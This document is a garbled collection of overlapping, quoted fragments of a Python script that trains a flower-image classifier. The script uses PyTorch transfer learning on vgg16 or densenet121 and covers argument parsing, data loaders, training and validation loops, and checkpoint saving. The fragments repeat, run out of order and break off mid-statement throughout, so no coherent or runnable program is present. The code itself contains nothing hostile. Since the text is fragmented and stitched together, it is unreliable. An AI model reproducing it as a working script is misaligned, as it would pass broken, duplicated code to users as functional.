elif architecture=='densenet121':", "return valid_loss, valid_acc def train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): '''", "as F import torch.utils.data from torchvision import datasets, models, transforms from collections import", "= validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3)", "valid_loss += criterion(output, labels).item() ps = torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc", "0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets =", "print('Using CPU') else: print('Incorrect Value for GPU entered.') print('Fallback to default GPU: 1')", "enumerate(train_loader): steps += 1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward and", "= 1024 else: print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture", "Forward and backward passes outputs = model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step()", "'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file))", "steps += 1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward", "architecture input_ = 25088 if hidden: hidden = hidden else: print('No number of", "be used later. ''' if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')", "architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 elif", "default learning_rate: 0.001') learning_rate = 0.001 if dropout: dropout = dropout else: print('No", "usage of our Python functions. 
''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture", "torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): '''", "running_loss += loss.item() if steps % print_every == 0: model.eval() with torch.no_grad(): valid_loss,", "architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 if hidden:", "six datasets and loaders, in the same order. ''' train_dir = data_dir +", "print('Incorrect Value for GPU entered.') print('Fallback to default GPU: 1') device = torch.device('cuda'", "for ii, (inputs, labels) in enumerate(train_loader): steps += 1 inputs, labels = inputs.to(device),", "= architecture input_ = 25088 if hidden: hidden = hidden else: print('No number", "0 for ii, (inputs, labels) in enumerate(train_loader): steps += 1 inputs, labels =", "''' if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA", "inputs specified. Fallback to default inputs: 1024') hidden = 1024 if learning_rate: learning_rate", "elif gpu=='N': device = 'cpu' print('Using CPU') else: print('Incorrect Value for GPU entered.')", "main(): args = arg_parser() if args.gpu: gpu=args.gpu else: print('No input given. Fallback to", "('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device)", "file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) # Main def main():", "1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes; N for No). 
Default is", "optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader, criterion, device): ''' Validation function", "input given. Fallback to default GPU: 1') gpu='Y' device = set_device(gpu) train_loader, test_loader,", "valid_acc = 0 for ii, (inputs, labels) in enumerate(valid_loader): inputs, labels = inputs.to(device),", "model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1',", "= model.forward(inputs) valid_loss += criterion(output, labels).item() ps = torch.exp(output) equality = (labels.data ==", "use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given. Fallback to default architecture: \\'vgg16\\'')", "'cpu' print('Using CPU') else: print('Incorrect Value for GPU entered.') print('Fallback to default GPU:", "parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)),", "parses them for usage of our Python functions. 
''' parser = argparse.ArgumentParser(description='ImageClassifier Params')", "GPU') elif gpu=='N': device = 'cpu' print('Using CPU') else: print('Incorrect Value for GPU", "{ 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True)", "+= criterion(output, labels).item() ps = torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc +=", "models.densenet121(pretrained=True) model.name = architecture input_ = 1024 else: print('Invalid input: Please use \\'vgg16\\'", "def arg_parser(): ''' Takes in command-line arguments and parses them for usage of", "criterion, optimizer) def validation(model, valid_loader, criterion, device): ''' Validation function for our model.", "transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test':", "the device based on the parameter. Also handles most edge-cases. Returns the device", "torch.utils.data from torchvision import datasets, models, transforms from collections import OrderedDict import os", "on the parameter. Also handles most edge-cases. 
Returns the device variable to be", "model ''' steps = 0 if epochs: epochs = epochs else: print('No epochs", "= models.vgg16(pretrained=True) model.name = architecture input_ = 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True)", "as np import torch from torch import nn from torch import optim import", "valid_loss, valid_acc = validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss =", "datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train':", "collections import OrderedDict import os import argparse # Functions def arg_parser(): ''' Takes", "data images, labels = images.to(device), labels.to(device) outputs = model(images) _, predicted = torch.max(outputs.data,", "help='Architecture and model from torchvision.models as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float,", "input_ = 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture input_ =", "learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device)", "print('No epochs specified. Fallback to default epochs: 1') epochs = 1 print('Training Model", "model = models.densenet121(pretrained=True) model.name = architecture input_ = 1024 else: print('Invalid input: Please", "(inputs, labels) in enumerate(train_loader): steps += 1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad()", "= epochs else: print('No epochs specified. 
Fallback to default epochs: 1') epochs =", "0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224),", "+= labels.size(0) correct += (predicted == labels).sum().item() accuracy = round(100 * correct /", "/ total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture): ''' Saves the", "return(args) def load(data_dir='./flowers'): ''' Loads data for train, test and validation. Also loads", "valid_acc = validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)),", "labels = images.to(device), labels.to(device) outputs = model(images) _, predicted = torch.max(outputs.data, 1) total", "images, labels = data images, labels = images.to(device), labels.to(device) outputs = model(images) _,", "''' Validation function for our model. Returns validation loss and accuracy. ''' valid_loss", "device = 'cpu' print('Using CPU') else: print('Incorrect Value for GPU entered.') print('Fallback to", "if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') return(device) def build(device,", "torch model. ''' if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture", "+ '/valid' test_dir = data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75),", "in test_loader: images, labels = data images, labels = images.to(device), labels.to(device) outputs =", "train, test and validation. 
Also loads dataloaders for all three in the same", "{}'.format(accuracy)) def save(model, train_data, epochs, architecture): ''' Saves the model to the given", "epochs: 1') epochs = 1 print('Training Model for {} epochs'.format(epochs)) for e in", "path. ''' model.class_to_idx = train_data.class_to_idx if epochs: epochs = epochs else: epochs =", "Fallback to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name = architecture input_ =", "optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device,", "dropout = 0.05 for parameter in model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([", "data in test_loader: images, labels = data images, labels = images.to(device), labels.to(device) outputs", "valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion, optimizer, train_loader, valid_loader, device,", "valid_data = load() model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model", "round(100 * correct / total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture):", "'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'],", "validation loss and accuracy. 
''' valid_loss = 0 valid_acc = 0 for ii,", "Validation Loss: {} :: Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss", "valid_loss, valid_acc)) running_loss = 0 model.train() print('Model training complete!') return(model) def validate(model, test_loader,", "all six datasets and loaders, in the same order. ''' train_dir = data_dir", "epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture = args.architecture) if __name__ ==", "a torch model. ''' if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name =", "print('No learning_rate specified. Fallback to default learning_rate: 0.001') learning_rate = 0.001 if dropout:", "if dropout: dropout = dropout else: print('No dropout specified. Fallback to default dropout:", "'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64,", "dropout: 0.05') dropout = 0.05 for parameter in model.parameters(): parameter.requires_grad = False classifier", "''' if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture input_ =", "running_loss = 0 for ii, (inputs, labels) in enumerate(train_loader): steps += 1 inputs,", "hidden = hidden else: print('No number of hidden inputs specified. Fallback to default", "image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) }", "vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural Network. 
Default", "= argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models as strings: vgg16", "[0.229, 0.224, 0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']),", "default epochs: 1') epochs = 1 print('Training Model for {} epochs'.format(epochs)) for e", "dropout, hidden, learning_rate. Returns a torch model. ''' if architecture: if architecture=='vgg16': model", "gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available;", "arguments and parses them for usage of our Python functions. ''' parser =", "from torch import optim import torch.nn.functional as F import torch.utils.data from torchvision import", "for our Dropout layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network", "transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229,", "{} :: Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss = 0", "import nn from torch import optim import torch.nn.functional as F import torch.utils.data from", "])) model.classifier = classifier model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model,", "Loads data for train, test and validation. 
Also loads dataloaders for all three", "valid_acc def train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains our", "model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 if hidden: hidden =", "== 0: model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion, device) training_loss", "0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]),", "learning_rate = 0.001 if dropout: dropout = dropout else: print('No dropout specified. Fallback", "shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'],", "them for usage of our Python functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture',", "Fallback to default inputs: 1024') hidden = 1024 if learning_rate: learning_rate = learning_rate", "= { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32,", "import pandas as pd import numpy as np import torch from torch import", "model.name = architecture input_ = 1024 else: print('Invalid input: Please use \\'vgg16\\' or", "GPU (Y for Yes; N for No). Default is Y.') args = parser.parse_args()", "Also loads dataloaders for all three in the same order. Returns all six", "the same order. Returns all six datasets and loaders, in the same order.", "learning_rate: 0.001') learning_rate = 0.001 if dropout: dropout = dropout else: print('No dropout", "type=int, help='Hidden Units for our Neural Network. 
Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout", "Fallback to default GPU: 1') gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader, train_data,", "def validation(model, valid_loader, criterion, device): ''' Validation function for our model. Returns validation", "model to the given path. ''' model.class_to_idx = train_data.class_to_idx if epochs: epochs =", "and accuracy. ''' valid_loss = 0 valid_acc = 0 for ii, (inputs, labels)", "complete!') return(model) def validate(model, test_loader, device): ''' Prints validation accuracy of model '''", "Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes; N for No).", "model from torchvision.models as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate", "saved to {}!'.format(file)) # Main def main(): args = arg_parser() if args.gpu: gpu=args.gpu", "criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)),", "# Forward and backward passes outputs = model.forward(inputs) loss = criterion(outputs, labels) loss.backward()", "= models.vgg16(pretrained=True) model.name = architecture input_ = 25088 if hidden: hidden = hidden", "Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given. Fallback to default architecture:", "= inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward passes outputs = model.forward(inputs) loss", "layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training. Default is", "Neural Network. 
Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout layers.", "print('Epoch: {}/{} :: Training Loss: {} :: Validation Loss: {} :: Validation Accuracy:", "valid_acc)) running_loss = 0 model.train() print('Model training complete!') return(model) def validate(model, test_loader, device):", "in range(epochs): running_loss = 0 for ii, (inputs, labels) in enumerate(train_loader): steps +=", "device, epochs=1, print_every=50): ''' Trains our Neural Network model ''' steps = 0", "and backward passes outputs = model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss", "Loss: {} :: Validation Loss: {} :: Validation Accuracy: {}' .format(e+1, epochs, training_loss,", "criterion(output, labels).item() ps = torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean()", "our Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural", "0 if epochs: epochs = epochs else: print('No epochs specified. Fallback to default", "= 1 print('Training Model for {} epochs'.format(epochs)) for e in range(epochs): running_loss =", "learning_rate else: print('No learning_rate specified. 
Fallback to default learning_rate: 0.001') learning_rate = 0.001", "'/valid' test_dir = data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(),", "1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward passes outputs", "transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406],", "Functions def arg_parser(): ''' Takes in command-line arguments and parses them for usage", "labels) in enumerate(train_loader): steps += 1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() #", "output = model.forward(inputs) valid_loss += criterion(output, labels).item() ps = torch.exp(output) equality = (labels.data", "pandas as pd import numpy as np import torch from torch import nn", "steps % print_every == 0: model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader,", "3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training", "our Dropout layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training.", "transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406],", "used later. 
''' if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if", "= torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available; using CPU')", "parameter in model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu',", "'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) }", "CPU') else: print('Incorrect Value for GPU entered.') print('Fallback to default GPU: 1') device", "+= equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1,", "= data_dir + '/train' valid_dir = data_dir + '/valid' test_dir = data_dir +", "labels).sum().item() accuracy = round(100 * correct / total, 2) print('Accuracy: {}'.format(accuracy)) def save(model,", "correct / total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture): ''' Saves", "0 model.train() print('Model training complete!') return(model) def validate(model, test_loader, device): ''' Prints validation", "def train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains our Neural", "Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout layers. Default is", "Neural Network training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes;", "Fallback to default dropout: 0.05') dropout = 0.05 for parameter in model.parameters(): parameter.requires_grad", "default dropout: 0.05') dropout = 0.05 for parameter in model.parameters(): parameter.requires_grad = False", "else: print('No input given. 
Fallback to default GPU: 1') gpu='Y' device = set_device(gpu)", "CPU') else: print('Using GPU') elif gpu=='N': device = 'cpu' print('Using CPU') else: print('Incorrect", "model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model", "train_data, epochs, architecture): ''' Saves the model to the given path. ''' model.class_to_idx", "loss.item() if steps % print_every == 0: model.eval() with torch.no_grad(): valid_loss, valid_acc =", "round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss: {} :: Validation Loss: {} ::", "torch from torch import nn from torch import optim import torch.nn.functional as F", "help='Dropout value for our Dropout layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for", "25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture input_ = 1024 else:", "hidden: hidden = hidden else: print('No number of hidden inputs specified. Fallback to", "model.name = architecture input_ = 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name =", "specified. Fallback to default epochs: 1') epochs = 1 print('Training Model for {}", "'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'],", "parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout layers. 
Default is 0.05.') parser.add_argument('--epochs', type=int,", "(labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion, optimizer,", "model.train() print('Model training complete!') return(model) def validate(model, test_loader, device): ''' Prints validation accuracy", "models.vgg16(pretrained=True) model.name = architecture input_ = 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name", "epochs'.format(epochs)) for e in range(epochs): running_loss = 0 for ii, (inputs, labels) in", "''' steps = 0 if epochs: epochs = epochs else: print('No epochs specified.", "running_loss = 0 model.train() print('Model training complete!') return(model) def validate(model, test_loader, device): '''", "order. Returns all six datasets and loaders, in the same order. ''' train_dir", "Prints validation accuracy of model ''' correct = 0 total = 0 with", "for usage of our Python functions. ''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str,", "if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available; using CPU') else: print('Using", ":: Training Loss: {} :: Validation Loss: {} :: Validation Accuracy: {}' .format(e+1,", "102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion = nn.NLLLoss() optimizer", "Yes; N for No). 
Default is Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'):", "epochs else: epochs = 1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx,", "transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456,", "device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture = args.architecture)", "model.class_to_idx = train_data.class_to_idx if epochs: epochs = epochs else: epochs = 1 checkpoint", "to be used later. ''' if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available() else", "{'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224),", "gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data = load() model,", "25088 if hidden: hidden = hidden else: print('No number of hidden inputs specified.", "same order. Returns all six datasets and loaders, in the same order. 
'''", "= train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data,", "dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the device based on", "image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the device based on the parameter. Also", "0: model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion, device) training_loss =", "for GPU entered.') print('Fallback to default GPU: 1') device = torch.device('cuda' if torch.cuda.is_available()", "image_datasets['valid']) def set_device(gpu): ''' Sets the device based on the parameter. Also handles", "+= loss.item() if steps % print_every == 0: model.eval() with torch.no_grad(): valid_loss, valid_acc", "Network training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes; N", "model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader,", "is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout layers. 
Default is 0.05.')", "strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our Neural Network.", "e in range(epochs): running_loss = 0 for ii, (inputs, labels) in enumerate(train_loader): steps", "backward passes outputs = model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss +=", "for parameter in model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)),", "optim import torch.nn.functional as F import torch.utils.data from torchvision import datasets, models, transforms", "_, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item()", "import torch.utils.data from torchvision import datasets, models, transforms from collections import OrderedDict import", "the parameter. Also handles most edge-cases. Returns the device variable to be used", "number of hidden inputs specified. Fallback to default inputs: 1024') hidden = 1024", "in the same order. ''' train_dir = data_dir + '/train' valid_dir = data_dir", "{ 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders =", "torch.exp(output) equality = (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def", "= round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss: {} :: Validation Loss: {}", "= data_dir + '/valid' test_dir = data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224),", "epochs specified. 
Fallback to default epochs: 1') epochs = 1 print('Training Model for", "parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data for train, test and validation. Also", "1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture}", "model.name = architecture input_ = 25088 if hidden: hidden = hidden else: print('No", "in the same order. Returns all six datasets and loaders, in the same", "architecture input_ = 1024 else: print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'') else:", "= 0 with torch.no_grad(): model.eval() for data in test_loader: images, labels = data", "'cpu') if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') elif gpu=='N':", "help='Hidden Units for our Neural Network. Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value", "train_dir = data_dir + '/train' valid_dir = data_dir + '/valid' test_dir = data_dir", "valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, epochs=args.epochs, architecture =", "validate(model, test_loader, device): ''' Prints validation accuracy of model ''' correct = 0", "valid_loss, valid_acc def train(model, criterion, optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains", "dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the device based on the", "our Neural Network. 
Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout", "+ '/train' valid_dir = data_dir + '/valid' test_dir = data_dir + '/test' data_transforms", "optimizer, train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains our Neural Network model '''", "criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader,", "nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion = nn.NLLLoss()", "shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def", "0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,", "the device variable to be used later. ''' if gpu=='Y': device = torch.device('cuda'", "range(epochs): running_loss = 0 for ii, (inputs, labels) in enumerate(train_loader): steps += 1", "= set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data = load() model, criterion, optimizer", "1') epochs = 1 print('Training Model for {} epochs'.format(epochs)) for e in range(epochs):", "device) training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3)", "labels.to(device) output = model.forward(inputs) valid_loss += criterion(output, labels).item() ps = torch.exp(output) equality =", "else: print('No epochs specified. 
